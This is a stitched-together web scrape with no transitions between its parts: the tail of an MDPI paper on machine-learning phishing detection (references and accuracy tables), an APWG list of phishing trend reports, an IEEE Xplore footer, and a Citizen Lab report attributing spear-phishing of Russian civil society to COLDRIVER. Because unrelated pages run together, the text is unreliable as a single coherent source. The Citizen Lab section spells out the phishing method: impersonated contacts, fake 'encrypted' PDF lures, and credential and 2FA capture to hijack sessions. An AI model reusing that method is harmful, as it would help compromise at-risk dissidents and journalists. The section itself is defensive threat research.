Mao, J.; Bian, J.; Tian, W.; Zhu, S.; Wei, T.; Li, A.; Liang, Z. Detecting Phishing Websites via Aggregation Analysis of Page Layouts—ScienceDirect. Procedia Comput. 2018 , 129 , 224–230. Available online: https://www.sciencedirect.com/science/article/pii/S187705091830276X (accessed on 27 September 2021). [ CrossRef ]
Yang, L.; Zhang, J.; Wang, X.; Li, Z.; Li, Z.; He, Y. An Improved ELM-Based and Data Preprocessing Integrated Approach for Phishing Detection Considering Comprehensive Features—ScienceDirect. Expert Syst. Appl. 2021 , 165 , 113863. Available online: https://www.sciencedirect.com/science/article/abs/pii/S0957417420306734 (accessed on 27 September 2021). [ CrossRef ]
Anupam, S.; Kar, A.K. Phishing Website Detection Using Support Vector Machines and Nature-Inspired Optimization Algorithms. Telecommun. Syst. 2021 , 76 , 17–32. Available online: https://link.springer.com/article/10.1007/s11235-020-00739-w (accessed on 27 September 2021). [ CrossRef ]
UCI Machine Learning Repository: Phishing Websites Data Set. Available online: https://archive.ics.uci.edu/ml/datasets/phishing+websites (accessed on 29 November 2021).
Ramesh, G.; Krishnamurthi, I.; Kumar, K.S.S. An Efficacious Method for Detecting Phishing Webpages through Target Domain Identification. Decis. Support Syst. 2014 , 61 , 12–22. [ Google Scholar ] [ CrossRef ]
Singh, C. Phishing Website Detection Based on Machine Learning: A Survey. In Proceedings of the 2020 6th International Conference on Advanced Computing and Communication Systems (ICACCS), IEEE, Coimbatore, India, 6–7 March 2020; pp. 398–404. [ Google Scholar ]
Alsariera, Y.A.; Elijah, A.V.; Balogun, A.O. Phishing Website Detection: Forest by Penalizing Attributes Algorithm and Its Enhanced Variations. Arab. J. Sci. Eng. 2020 , 45 , 10459–10470. [ Google Scholar ] [ CrossRef ]

Model	Dataset	Algorithm	Accuracy
James et al. [ ]	URLs	IBK, SVM, NB	89.75%
Subasi et al. [ ]	website	ANN, KNN, RF, SVM, C4.5, RF	97.36%
Mao et al. [ ]	Websites	SVM, RF, DT, AB	93%
Tyagi et al. [ ]	URLs	DT, RF, GBM	98.40%
Chen and Chen [ ]	websites	ELM, SVM, LR, C4.5, LC-ELM, KNN, XGB	99.2%
Joshi et al. [ ]	Websites	RF	97.63%
Ubing et al. [ ]	UCI	Ensemble bagging, boosting, stacking	95.4%
Sahingoz et al. [ ]	Websites	SVM, DT, RF, KNN, KS, NB	97.98%
Abdelhamid et al. [ ]	URLs	eDRI	93.5%
Patil et al. [ ]	URLs	LR, DT, RF	96.58%
Jain and Gupta [ ]	Websites	RF	99.57%
Jagadeesan et al. [ ]	URLs	RF, SVM	95.11%
Niranjan et al. [ ]	Websites	RC, kNN, IBK, LR, PART	97.3%
Chiew et al. [ ]	URLs	RF, C4.5, PART, SVM, NB	96.17%
Pandey et al. [ ]	Websites	SVM, RF	94%
Ali and Ahmed [ ]	Websites	Genetic algorithm (GA) + DNN	89.50%
Aljofey et al. [ ]	Websites	CNN	95.02%
Shie [ ]	Websites	Convolutional auto encoder + DNN	89.00%
Maurya and Jain [ ]	Websites	PSL 1 + PART	99.30%
Wang et al. [ ]	Websites	RNN + CNN	95.79%
Lakshmi et al. [ ]	UCI	DNN +Adam	96.00%
Li et al. [ ]	URLs	GBDT, XGBoost and LightGBM	98.60%
Yang et al. [ ]	Websites	Auto encoder + NIOSELM	94.60%
Anupam and Arpan [ ]	Websites	Grey wolf optimizer + SVM	90.38%

Classifier	Before Use Normalization	After Use Normalization
SVM	Accuracy: 94.46 Precision: 93.64 Recall: 96.62 F1-measure: 95.10	Accuracy: 94.66 Precision: 93.9 Recall: 96.6 F1-measure: 95.3
ANN	Accuracy: 95.5 Precision: 95.6 Recall: 96.3 F1-measure: 96	Accuracy: 96.2 Precision: 96 Recall: 97.2 F1-measure: 96.6
RF	Accuracy: 96.86 Precision: 96.56 Recall: 97.84 F1-measure: 97.20	Accuracy: 97.3 Precision: 96.9 Recall: 98.62 F1-measure: 97.6
DT	Accuracy: 95.4 Precision: 95.8 Recall: 95.9 F1-measure: 95.8	Accuracy: 96.3 Precision: 96.5 Recall: 96.8 F1-measure: 96.7

Classifier	Parameters	TPR	TNR
SVM	Kernel function = rbf	0.92	0.96
ANN	Iterations = 500, Activation = Relu, Optimizer = Adam	0.94	0.96
RF	Trees = 100, Creation = gini	0.96	0.98
DT	Criterion = gini, Splitter = best	0.95	0.96

Classifier	Accuracy	Precision	Recall	F1-Measure
SVM	94.66	93.9	96.6	95.3
ANN	95.5	95.6	96.3	96
RF	97.3	96.9	98.2	97.6
DT	96.3	96.5	96.8	96.7

Schemes	Dataset	Algorithm	Accuracy
Ubing et al. [ ]	UCI	Ensemble bagging, boosting, stacking	95.4%
Alsariera et al. [ ]	UCI	ForestPA-PWDM, Bagged-ForestPA-PWDM, and Adab-ForestPA-PWDM	96.26% 96.5% 97.4%
Lakshmi et al. [ ]	UCI	DNN +Adam	96.00%
Random Forest Model	UCI	Random Forest	97.3%

The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content.

Share and Cite

Alnemari, S.; Alshammari, M. Detecting Phishing Domains Using Machine Learning. Appl. Sci. 2023 , 13 , 4649. https://doi.org/10.3390/app13084649

Alnemari S, Alshammari M. Detecting Phishing Domains Using Machine Learning. Applied Sciences . 2023; 13(8):4649. https://doi.org/10.3390/app13084649

Alnemari, Shouq, and Majid Alshammari. 2023. "Detecting Phishing Domains Using Machine Learning" Applied Sciences 13, no. 8: 4649. https://doi.org/10.3390/app13084649

Article Metrics

Article access statistics, further information, mdpi initiatives, follow mdpi.

Subscribe to receive issue release notifications and newsletters from MDPI journals

eCrime Research | About APWG | Report Phishing Emails

Phishing Activity Trends Reports

The APWG Phishing Activity Trends Report analyzes phishing attacks reported to the APWG by its member companies, its Global Research Partners, through the organization’s website at https://apwg.org , and by e-mail submissions to [email protected]. APWG also measures the evolution, proliferation, and propagation of crimeware by drawing from the research of our member companies.

Summary – 1st Quarter 2024

Phone-based phishing, directly engaging victims, proliferates unchecked. Phone numbers used for fraud comprised more than 20% of fraud-related assets identified by OpSec in Q1 2024.
Phishing using phone calls — so-called voice phishing or “vishing”— is increasing every quarter.
In Q1 2024, APWG observed 963,994 phishing attacks, the lowest quarterly total since Q4 2021.
Social media platforms were the most frequently attacked sector, targeted by 37.4% all phishing attacks in Q1 2024. Banking-segment phishing continued to decline, down to 9.8 percent
The average wire transfer amount requested in BEC attacks in Q1 2024 was $84,059, up nearly 50% from the prior quarter’s average.

Legacy Reports

Phishing Attack Trends Report – 4Q 2023 Anti-Phishing Working Group – Released November 13, 2023

Phishing Attack Trends Report – 3Q 2023 Anti-Phishing Working Group – Released November 13, 2023

Phishing Attack Trends Report – 2Q 2023 Anti-Phishing Working Group – Released November 02, 2023

Phishing Attack Trends Report – 1Q 2023 Anti-Phishing Working Group – Released November 02, 2023

Phishing Attack Trends Report – 3Q 2022 Anti-Phishing Working Group – Released December 12, 2022

Phishing Attack Trends Report – 2Q 2022 Anti-Phishing Working Group – Released September 20, 2022

Phishing Attack Trends Report – 1Q 2022 Anti-Phishing Working Group – Released June 07, 2022

Phishing Attack Trends Report – 4Q 2021 Anti-Phishing Working Group – Released February, 2022

Phishing Attack Trends Report – 3Q 2021 Anti-Phishing Working Group – Released November, 2021

Phishing Attack Trends Report – 2Q 2021 Anti-Phishing Working Group – Released June 08, 2021

Phishing Attack Trends Report – 1Q 2021 Anti-Phishing Working Group – Released June 08, 2021

Phishing Attack Trends Report – 4Q 2020 Anti-Phishing Working Group – Released February 09, 2021

Phishing Attack Trends Report – 3Q 2020 Anti-Phishing Working Group – Released November 24, 2020

Phishing Attack Trends Report – 2Q 2020 Anti-Phishing Working Group – Released May 11, 2020

Phishing Attack Trends Report – 1Q 2020 Anti-Phishing Working Group – Released May 11, 2020

Phishing Attack Trends Report – 4Q 2019 Anti-Phishing Working Group – Released November 4, 2019

Phishing Attack Trends Report – 3Q 2019 Anti-Phishing Working Group – Released November 4, 2019

Phishing Attack Trends Report – 2Q 2019 Anti-Phishing Working Group – Released Sept 12, 2019

Phishing Attack Trends Report – 1Q 2019 Anti-Phishing Working Group – Released May 15, 2019

Phishing Attack Trends Report – 4Q 2018 Anti-Phishing Working Group – Released Mar 04, 2019

Phishing Attack Trends Report – 3Q 2018 Anti-Phishing Working Group – Released Dec 12, 2018

Phishing Attack Trends Report – 2Q 2018 Anti-Phishing Working Group – Released Oct 18, 2018

Phishing Attack Trends Report – 1Q 2018 Anti-Phishing Working Group – Released July 31, 2018

Phishing Attack Trends Report – 4Q 2017 Anti-Phishing Working Group – Released May 15, 2018

Phishing Attack Trends Report – 3Q 2017 Anti-Phishing Working Group – Released Feb 27, 2018

Phishing Attack Trends Report – 1H 2017 Anti-Phishing Working Group – Released Oct 17, 2017

Phishing Attack Trends Report – 4Q 2016 Anti-Phishing Working Group – Released Feb 22, 2017

Phishing Attack Trends Report – 3Q 2016 Anti-Phishing Working Group – Released Dec 21, 2016

Phishing Attack Trends Report – 2Q 2016 Anti-Phishing Working Group – Released Oct 03, 2016

Phishing Attack Trends Report – 1Q 2016 Anti-Phishing Working Group – Released May 24, 2016

Phishing Attack Trends Report – 4Q 2015 Anti-Phishing Working Group – Released March 22, 2016

Phishing Attack Trends Report – 1Q-Q3 2015 Anti-Phishing Working Group – Released December 23, 2015

Phishing Attack Trends Report – 4Q 2014 Anti-Phishing Working Group – Released April 29, 2015

Phishing Attack Trends Report – 3Q 2014 Anti-Phishing Working Group – Released March 30, 2015

Phishing Attack Trends Report – 2Q 2014 Anti-Phishing Working Group – Released Aug 29, 2014

Phishing Attack Trends Report – 1Q 2014 Anti-Phishing Working Group – Released Jun 23, 2014

Phishing Attack Trends Report – 4Q 2013 Anti-Phishing Working Group – Released Apr 27, 2014

Phishing Attack Trends Report – 3Q 2013 Anti-Phishing Working Group – Released Feb 07, 2014

Phishing Attack Trends Report – 2Q 2013 Anti-Phishing Working Group – Released Nov 06, 2013

Phishing Attack Trends Report – 1Q 2013 Anti-Phishing Working Group – Released July 30, 2013

Phishing Attack Trends Report – 4Q 2012 Anti-Phishing Working Group – Released April 24, 2013

Phishing Attack Trends Report – 3Q2012 Anti-Phishing Working Group – Released February 1, 2013

Phishing Attack Trends Report – 2Q 2012 Anti-Phishing Working Group – Released September 12, 2012

Phishing Attack Trends Report – 1Q 2012 Anti-Phishing Working Group – Released July 19, 2012

Phishing Attack Trends Report – 2H 2011 Anti-Phishing Working Group – Released May 25, 2012

Phishing Attack Trends Report – 1H 2011 Anti-Phishing Working Group – Released Dec 23, 2011

Phishing Attack Trends Report – 2H 2010 Anti-Phishing Working Group – Released Jul 31, 2011

Phishing Attack Trends Report – Q2 2010 Anti-Phishing Working Group – Released Jan 26, 2010

Phishing Attack Trends Report – Q1 2010 Anti-Phishing Working Group – Released Sept 23, 2010

Phishing Attack Trends Report – Q4 2009 Anti-Phishing Working Group – Released Mar 05, 2010

Phishing Attack Trends Report – Q3 2009 Anti-Phishing Working Group – Released Jan 13, 2010

Phishing Attack Trends Report – First Half 2009 Anti-Phishing Working Group – Released Sept 27, 2009

Phishing Attack Trends Report – Second Half 2008 Anti-Phishing Working Group – Released Mar 17, 2009

Phishing Attack Trends Report – Second Quarter 2008 Anti-Phishing Working Group – Released Dec 8, 2008

Phishing Attack Trends Report – First Quarter 2008 Anti-Phishing Working Group – Released Aug 29, 2008

Note: Starting in 2008 the APWG began generating it’s phishing trends report on a quarterly and annual bases. This longer term view will allow time for better analysis to asses trends in electroinic crime and phishing.

Phishing Attack Trends Report – January 2008 Anti-Phishing Working Group – Released Mar 3, 2008

Phishing Attack Trends Report – December 2007 Anti-Phishing Working Group – Released Mar 3, 2008

Phishing Attack Trends Report – November 2007 Anti-Phishing Working Group – Released Jan 25, 2008

Phishing Attack Trends Report – October 2007 Anti-Phishing Working Group – Released Jan 7, 2008

Phishing Attack Trends Report – September 2007 Anti-Phishing Working Group – Released Dec 17, 2007

Phishing Attack Trends Report – August 2007 Anti-Phishing Working Group – Released Nov 19, 2007

Phishing Attack Trends Report – July 2007 Anti-Phishing Working Group – Released Oct 18, 2007

Phishing Attack Trends Report – Jun 2007 Anti-Phishing Working Group – Released Sept 3, 2007

Phishing Attack Trends Report – May 2007 Anti-Phishing Working Group – Released July 8, 2007

Phishing Attack Trends Report – April 2007 Anti-Phishing Working Group – Released May 23 2007

Phishing Attack Trends Report – March 2007 Anti-Phishing Working Group – Released May 14 2007

Phishing Attack Trends Report – February 2007 Anti-Phishing Working Group – Released April 11 2007

Phishing Attack Trends Report – January 2007 Anti-Phishing Working Group – Released March 2007

Phishing Attack Trends Report – December 2006 Anti-Phishing Working Group – Released February 2007

Phishing Attack Trends Report – November 2006 Anti-Phishing Working Group – Released January 2007

Phishing Attack Trends Report – Sept/Oct 2006 Anti-Phishing Working Group – Released December 2006

Phishing Attack Trends Report – August 2006 Anti-Phishing Working Group – Released October 2006

Phishing Attack Trends Report – July 2006 Anti-Phishing Working Group – Released September 2006

Phishing Attack Trends Report – June 2006 Anti-Phishing Working Group – Released August 2006

Phishing Attack Trends Report – May 2006 Anti-Phishing Working Group – Released June 2006

Phishing Attack Trends Report – April 2006 Anti-Phishing Working Group – Released May 2006

Phishing Attack Trends Report – March 2006 Anti-Phishing Working Group – Released May 2006

Phishing Attack Trends Report – February 2006 Anti-Phishing Working Group – Released April 2006

Phishing Attack Trends Report – January 2006 Anti-Phishing Working Group – Released March 2006

Phishing Attack Trends Report – December 2005 Anti-Phishing Working Group – Released Feb , 2006

Phishing Attack Trends Report – November 2005 Anti-Phishing Working Group – Released Jan 09, 2006

Phishing Attack Trends Report – October 2005 Anti-Phishing Working Group – Released Dec 13, 2005

Phishing Attack Trends Report – September 2005 Anti-Phishing Working Group – Released Nov 15, 2005

Phishing Attack Trends Report – August 2005 Anti-Phishing Working Group – Released Sept 10, 2005

Phishing Attack Trends Report – July 2005 Anti-Phishing Working Group – Released June 21, 2005

Phishing Attack Trends Report – June 2005 Anti-Phishing Working Group – Released June 21, 2005

Phishing Attack Trends Report – May 2005 Anti-Phishing Working Group – Released May 28, 2005

Phishing Attack Trends Report – April 2005 Anti-Phishing Working Group – Released April 22, 2005

Phishing Attack Trends Report – March 2005 Anti-Phishing Working Group – Released March 27, 2005

Phishing Attack Trends Report – February 2005 Anti-Phishing Working Group – Released March 24, 2005

Phishing Attack Trends Report – January 2005 Anti-Phishing Working Group – Released February 24, 2005

Phishing Attack Trends Report – December 2004 Anti-Phishing Working Group – Released January 20, 2005

Phishing Attack Trends Report – November 2004 Anti-Phishing Working Group – Released December, 2004

NOTE: Starting with the August-October 2004 Phishing Attack Trends Report, a secondary way of tracking phishing attacks was added to the methodology. We now track unique email lures and unique data collection server sites. See the reports for more details.

Phishing Attack Trends Report – August-October 2004 Anti-Phishing Working Group – Released November, 2004

Phishing Attack Trends Report – July 2004 Anti-Phishing Working Group – Released August, 2004

Phishing Attack Trends Report – June 2004 Anti-Phishing Working Group – Released July, 2004

Phishing Attack Trends Report – May 2004 Anti-Phishing Working Group – Released June, 2004

Phishing Attack Trends Report – April 2004 Anti-Phishing Working Group – Released May, 2004

Phishing Attack Trends Report – March 2004 Anti-Phishing Working Group – Released Apr, 2004

Phishing Attack Trends Report – February 2004 Anti-Phishing Working Group – Released Mar, 2004

Special Report on Phishing – March 2004 United States Department of Justice – Released Mar, 2004

Phishing Attack Trends Report – January 2004 Anti-Phishing Working Group – Released Feb, 2004

IEEE Account

Change Username/Password
Update Address

Purchase Details

Payment Options
Order History
View Purchased Documents

Profile Information

Communications Preferences
Profession and Education
Technical Interests
US & Canada: +1 800 678 4333
Worldwide: +1 732 981 0060
Contact & Support
About IEEE Xplore
Accessibility
Terms of Use
Nondiscrimination Policy
Privacy & Opting Out of Cookies

A not-for-profit organization, IEEE is the world's largest technical professional organization dedicated to advancing technology for the benefit of humanity. © Copyright 2024 IEEE - All rights reserved. Use of this web site signifies your agreement to the terms and conditions.

Rivers of Phish Sophisticated Phishing Targets Russia’s Perceived Enemies Around the Globe

[1] Co-lead author
[2] Co-lead author
A sophisticated spear phishing campaign has been targeting Western and Russian civil society.
This campaign, which we have investigated in collaboration with Access Now and with the participation of numerous civil society organizations including First Department , Arjuna Team, and RESIDENT.ngo , engages targets with personalized and highly-plausible social engineering in an attempt to gain access to their online accounts.
We attribute this campaign to COLDRIVER (also known as Star Blizzard, Callisto and other designations). This threat actor is attributed to the Russian Federal Security Service (FSB) by multiple governments.
We identified a second threat actor targeting similar communities, whom we name COLDWASTREL. We assess that this actor is distinct from COLDRIVER, and that the targeting that we have observed aligns with the interests of the Russian government.
The Citizen Lab is sharing all indicators with major email providers to assist them in tracking and blocking these campaigns.

Click here to read the Access Now Report and the Access Now Helpline Technical Brief.

1. River of Phish: Campaign Overview

Our collaborative investigation with Access Now , with the assistance of multiple additional civil society organizations including First Department , Arjuna Team, and RESIDENT.ngo , has identified digital targeting using sophisticated spear phishing by this threat actor across multiple countries and sectors within civil society.

Observed Targets

The targets range from prominent Russian opposition figures-in-exile to staff at nongovernmental organizations in the US and Europe, funders, and media organizations. A focus on Russia, Ukraine, or Belarus is a common thread running through all of the cases. Some of the targets still live and work in Russia, placing them at considerable risk. Almost all targets that spoke with us and our investigative partner, Access Now, have chosen to remain unnamed and, for their privacy and safety, we are only including indicators from a limited selection of the cases that we have examined.

Polina Machold, Publisher of Proekt Media is among the targets, and we observed the attackers masquerading as an individual known to her. Proekt conducts high profile investigative reporting into official corruption and abuses of power in Russia. They are well known for high-profile reporting on Vladimir Putin, Ramzan Kadyrov, and other highly-placed Russian officials. Soon after their reporting into Russia’s interior minister in 2021, they were declared an “undesirable organization” by the Russian Government.

We have also observed targeting of former officials and academics in the US think tank and policy space. For example, former US Ambassador to Ukraine, Steven Pifer was targeted with a highly-credible approach impersonating someone known to him: a fellow former US Ambassador.

We judge that these targets may have been selected for their extensive networks among sensitive communities, such as high-risk individuals within Russia. For some, successful compromise could result in extremely serious consequences, such as imprisonment or physical harm to themselves or their contacts.

Importantly, we suspect that the total pool of targets is likely much larger than the civil society groups whose cases we have analyzed. We have observed US government personnel impersonated as part of this campaign, and given prior reporting about COLDRIVER’s targeting, we expect the US government remains a target.

Typical Attack Flow: A Credible, Personalized Approach

The most common tactic we have observed is for the threat actor to initiate an email exchange with the target masquerading as someone known to them. This tactic includes masquerading as colleagues, funders, and US government employees. Typically, the messages contain text requesting that the recipient review a document relevant to their work, such as a grant proposal or an article draft.

In some cases, we have observed additional communication by the threat actor preceding or following the targeting message. Often highly and effectively personalized, this communication illustrates the depth of the threat actors’ understanding of the targets. Multiple targets believed that they were exchanging emails with a real person.

We often observed the attacker omitting to attach a PDF file to the initial message requesting a review of the “attached” file. We believe this was intentional, and intended to increase the credibility of the communication, reduce the risk of detection, and select only for targets that replied to the initial approach (e.g. pointing out the lack of an attachment).

a purportedly-encrypted PDF lure. The phishing page is reached by clicking

The email message typically contains an attached PDF file purported to be encrypted or “protected,” using a privacy-focused online service such as ProtonDrive, for example. In fact, this is a ruse. When opened, the PDF displays what appears to be blurred text along with a link to “decrypt” or access the file. Actual ProtonDrive encryption looks substantially different from the River of Phish lures, suggesting that the attackers are relying on a general lack of awareness of what secure and encrypted document sharing looks like. In other cases, the blurred PDF includes text saying that a preview is not available, again soliciting a click.

While typical attacks were limited to a PDF, we also observed a few cases in which the attackers also sent an email crafted to appear as a document share, with the phishing link directly embedded in the email message. When one such case seemingly failed to generate a successful compromise, the attackers followed up with a PDF.

In some cases, the attackers followed up with targets that failed to enter their credentials with multiple messages asking if they had seen or “reviewed” the material. This approach, again, suggests a high degree of focus on particular targets.

If the Target Clicks

If the target clicks on the link, their browser will fetch JavaScript code from the attacker’s server that computes a fingerprint of the target’s system and submits it to the server (see: Target Fingerprinting ). If the server elects to proceed with the attack, the server will return a URL, and the JavaScript code running in the target’s browser will redirect the target there. If the server chooses, a CAPTCHA (from hCaptcha ) may be shown to the user prior to any redirect. The URL to which the target is redirected is typically a webpage crafted by the attacker to look like a genuine login page for the target’s email service (e.g. Gmail or ProtonMail).

The login page may be pre-populated with the target’s email address to mimic the legitimate login page. If the target enters their password and two-factor code into the form, these items will be sent to the attacker who will use them to complete the login and obtain a session cookie for the target’s account. This cookie allows the attacker to access the target’s email account as if they were the target themselves. The attacker can continue to use this token for some time without re-authenticating.

The use of a credible email ruse plus a PDF containing a phishing link is a favorite technique of multiple threat actors. Notably, PDF viewers built into webmail services like Gmail allow the recipient to click on hyperlinks within a PDF, and thus do not impede this attack.

2. River of Phish Campaign Infrastructure

First-stage domains.

The first-stage infrastructure for this campaign involves phishing links embedded in the delivered PDFs, or sent in emails crafted to appear as document shares. The attackers typically register the domains and host the websites using Hostinger . Domains registered with Hostinger are hosted on shared servers which rotate IP addresses approximately every 24 hours, making the campaign more difficult to track. We did not identify any cases where a domain was operationally used within 30 days of its registration. This is a possible attempt to avoid being blocked by detection rules aimed at flagging emails or attachments with hyperlinks containing a recently registered domain.


ithostprotocol[.]com	2024-01-16	2024-02-20	NameCheap	cPanel
xsltweemat[.]org	2024-03-14	2024-04-12	Hostinger	Let’s Encrypt
eilatocare[.]com	2024-04-09	2024-05-29	Hostinger	Let’s Encrypt
egenre[.]net	2024-05-19	2024-06-19	Hostinger	Let’s Encrypt
esestacey[.]net	2024-05-19	2024-06-19	Hostinger	ZeroSSL
ideaspire[.]net	2024-05-20	2024-06-24	Hostinger	Let’s Encrypt

If the target clicks on the link in the PDF, the attack moves onto the next stage, which involves fingerprinting the user’s system.

Target Fingerprinting

Each first-stage domain runs JavaScript code to fingerprint the target’s browser and returns the fingerprint to the server, which decides how to proceed. Because we cannot see the server’s code, we are not fully sure what the purpose of the fingerprinting is. However, because the server can elect to show a CAPTCHA to the target, we presume that the purpose of the fingerprinting may be to prevent certain automated tools from obtaining or analyzing the second-stage infrastructure, which contains the phishing page.

We did not directly observe the second stage of the attack or the credentials being passed back to the attacker’s infrastructure; however, based on the targets’ descriptions of the login page it is likely that the attackers leveraged a tool that is specifically designed to capture user credentials and enable unauthorized access, such as Evilginx or another phishing platform. We note that COLDRIVER has been observed using Evilginx in recent cases.

Our investigative partner, Access Now, has included a description of the fingerprinting code in their Technical Brief . The fingerprinting code was obfuscated using the Hunter PHP Javascript Obfuscator, a tool that is publicly available on GitHub .

Frequent Metadata Overlaps Across PDFs

PDFs associated with this campaign share consistent characteristics, including the location and formatting of the malicious link within the PDF, the PDF metadata, and the use of a fake English-language name that is different in each case for the PDF author. Based on the names identified in the PDFs, it appears that a name list such as this one or this one was used in the generation of these names.

The chart below includes metadata from some PDFs that were shared directly with the Citizen Lab and Access Now.



b07d54a178726ffb9f2d5a38e64116cbdc361a1a0248fb89300275986dc5b69d	Gracelyn Reilly	LibreOffice 7.0	en-US
0ded441749c5391234a59d712c9d8375955ebd3d4d5848837b8211c6b27a4e88	Talon Blackburn	LibreOffice 7.0	en-US
efa2fd8f8808164d6986aedd6c8b45bb83edd70ca4e80d7ff563a3fbc05eab89	Howard Howe	LibreOffice 7.0	en-US
384d3027d92c13da55ceef9a375e8887d908fd54013f49167946e1791730ba22	Annabelle Kline	LibreOffice 7.0	en-US
00664f72386b256d74176aacbe6d1d6f6dd515dd4b2fcb955f5e0f6f92fa078e	Paulina Mullen	LibreOffice 7.0	en-US
79f93e57ad6be28aae62d14135140289f09f86d3a093551bd234adc0021bb827	Emery Hogan	LibreOffice 7.0	en-US

Target Phishing

In the cases we analyzed as part of this particular campaign, user credentials and associated two-factor authentication (2FA) tokens appear to be the primary targets of this phase of attack. We did not find any spyware delivered to target devices as part of this particular campaign. The focus on account access simplifies the attack infrastructure that is needed, as the attackers do not need to gain persistence or establish ongoing communications with the target’s machine. It is important to note that the individuals and organizations targeted in this campaign likely face additional threats, such as spyware attacks (See here , for example).

In January of 2024, Google’s Threat Analysis Group (TAG) reported on a custom malware backdoor called SPICA, which they assessed was the first known case of COLDRIVER developing and deploying custom malware. Similarly, we believe some of the targets who shared files with us may be regularly targeted by multiple threat actors and using multiple Tactics, Techniques, and Procedures ( TTPs ). While this particular campaign did not leverage malware, we encourage human rights defenders, dissidents, journalists, and other members of civil society that may be targeted by Russian authorities to exercise extreme vigilance and contact experts such as Access Now’s Digital Security Helpline for help. We provide tips on how to identify suspicious communications below (See: Protect Yourself & Your Colleagues ).

3. River of Phish: COLDRIVER Attribution

COLDRIVER is a Russia-based threat group attributed by several governments to be subordinate to the Russian Federal Security Service (FSB) Centre 18 ( See: The Russian Cyber Espionage Landscape , below). They have been active since at least 2019, possibly earlier, and their tactics primarily include very-involved social engineering and persona development. These personas are typically used to trick the target into visiting a malicious link, leading to the theft of their credentials, the bypassing of 2FA, and access to the target’s information. This group has targeted widely in a pattern that aligns with Russian state interests, including targeting academia, NGOs, government institutions, and think tanks.

Selected Prior Reporting on COLDRIVER

Prior reporting on COLDRIVER describes strikingly similar tactics to the ones we see in this campaign. In 2017, cybersecurity firm F-Secure reported on the activities of a group they tracked as “ Callisto group ”, writing that they had tracked them since 2015. Their research highlighted the group’s use of spear phishing to target “military personnel, government officials, think tanks and journalists.” The attackers frequently impersonated legitimate websites and email addresses to trick targets into providing their credentials. At the time, F-Secure did not publicly attribute the group.


F-Secure	Callisto group
Microsoft	Star Blizzard / SEABORGIUM
Google TAG	COLDRIVER
PWC	Blue Callisto
Proofpoint	TA446
Sekoia	Calisto
Recorded Future	Blue Charlie
Mandiant	UNC4057

In 2022, Microsoft reported on the group , which they track as Star Blizzard (previously SEABORGIUM ). Google’s Threat Assessment Group (TAG) reported on them as COLDRIVER , PWC reported on them as Blue Callisto, Proofpoint reported on them as TA446 , Sekoia reported on them as Calisto, and Recorded Future reports on them as Blue Charlie . All research teams described similar tactics: elaborate spear phishing campaigns impersonating individuals known to the targets with the goal of stealing credentials to accounts and accessing sensitive information. In 2022, attribution was typically framed as “ a likely Russia-based actor .”

Attribution of COLDRIVER to the FSB in a Joint Governmental Advisory

In December 2023, government agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States issued a joint cybersecurity advisory detailing the activities of COLDRIVER. The advisory attributed the group to the FSB’s Centre 18. The advisory notes that COLDRIVER’s targets include “academia, defense, governmental organizations, NGOs, think tanks and politicians.” The TTPs outlined in the advisory include extended target reconnaissance, the use of fake email and social media accounts, preference to target personal emails, the use of conference or event invitations as lures, the use of malicious domains impersonating legitimate organizations and more.

Attributing The River of Phish Campaign to COLDRIVER

Multiple TTPs and targeting from the River of Phish campaign closely align with public reporting on COLDRIVER. However, some of COLDRIVER’s tactics (like lures using “encrypted” documents) share certain similarities with other threat actors. To increase our confidence, we sought to ensure that the River of Phish campaign matches multiple other research groups’ COLDRIVER attribution. To that end, we approached Microsoft MSTIC, Proofpoint, and PwC, among others. Materials they shared enabled us to identify multiple direct overlaps between the River of Phish campaign and COLDRIVER. Finally, each independently confirmed that the activity we identified matched their own tracking of COLDRIVER. Together, this information suggests that the River of Phish campaign is attributable to the threat actor identified as COLDRIVER.

River of Phish Sample Overlap with Known COLDRIVER Campaigns

Proofpoint shared several publicly-available PDFs (on VirusTotal) with us that they attribute to COLDRIVER. Examination of these PDFs yielded multiple critical overlaps with the River of Phish campaign including: (a) matching bait PDF document structure and metadata and (b) overlapping phishing infrastructure.

Like the River of Phish (“RoP”) PDFs (See: Table 2 above), those shared by Proofpoint included identical LibreOffice versions, seemingly-randomized author names, and en-US language settings.


c1fa7cd73a14946fc760a54ebd0c853fab24a080cbf6b8460a949f28801e16fc	Alexis Hill	LibreOffice 7.0	en-US
603221a64f2843674ad968970365f182c228b7219b32ab3777c265804ef67b0a	Carley Rivers	LibreOffice 7.0	en-US
df9d77f3e608c92ef899e5acd1d65d87ce2fdb9aab63bbf58e63e6fd6c768ac3	Haylie Wolf	LibreOffice 7.0	en-US

In addition to the PDF document metadata overlap, we observed substantial visual and content similarities in the PDFs. For example, RoP Example 1 shares bait text with this COLDRIVER-attributed text, and RoP Example 2 includes a variant on the filename used in the COLDRIVER-attributed PDF (See: Figure 2).

Figure 6: Two River of Phish PDFs and one COLDRIVER PDF (Note: The Example 1 screenshot has been redacted to remove the name of an impersonated organization).

Phishing Infrastructure Overlaps

In addition to the highly similar PDF content, phishing infrastructure linked from RoP bait PDFs showed substantial overlaps between the RoP campaign and COLDRIVER. The COLDRIVER-attributed PDFs contained links to multiple phishing domains (For example, See: Table 5).


togochecklist[.]com	2023-08-28	NameCheap	Let’s Encrypt
vocabpaper[.]com	2024-03-15	Hostinger	Let’s Encrypt
matalangit[.]org	2024-05-07	Hostinger	ZeroSSL

The COLDRIVER phishing domain registration patterns exhibited similar characteristics to the ones we identified, such as registration using Hostinger and TLS certificates issued by Let’s Encrypt or ZeroSSL.


	Namecheap, Hostinger	Namecheap, Hostinger, others
	ZeroSSL, Let’s Encrypt	ZeroSSL, Let’s Encrypt, others

In addition, reporting shared by PwC detailed recent COLDRIVER activity and validated our attribution of both PDFs and domains from this campaign.

Additional TTP Overlap with Prior Public Reporting on COLDRIVER

Additionally, we noted that River of Phish employed a number of known TTPs of COLDRIVER.

The social engineering and spear-phishing delivery methodology remained consistent across past COLDRIVER activity and the current campaign we are tracking. These methods include:

Impersonating a known individual by setting up a Proton Mail account using their name;
Using information gained through reconnaissance to tailor the message in the initial email to make it look more authentic;
Employing language indicating a desire to collaborate on a shared area of interest; and
Using a fake password protected/encrypted PDF with the content blurred in the preview.

In one case, a RoP PDF features the text “ Hmm… looks like this file doesn’t have a preview we can show you ” (an error message shown by multiple Microsoft services when a file is not previewable) and a 2023 PDF from COLDRIVER features the identical text (Figure 4).

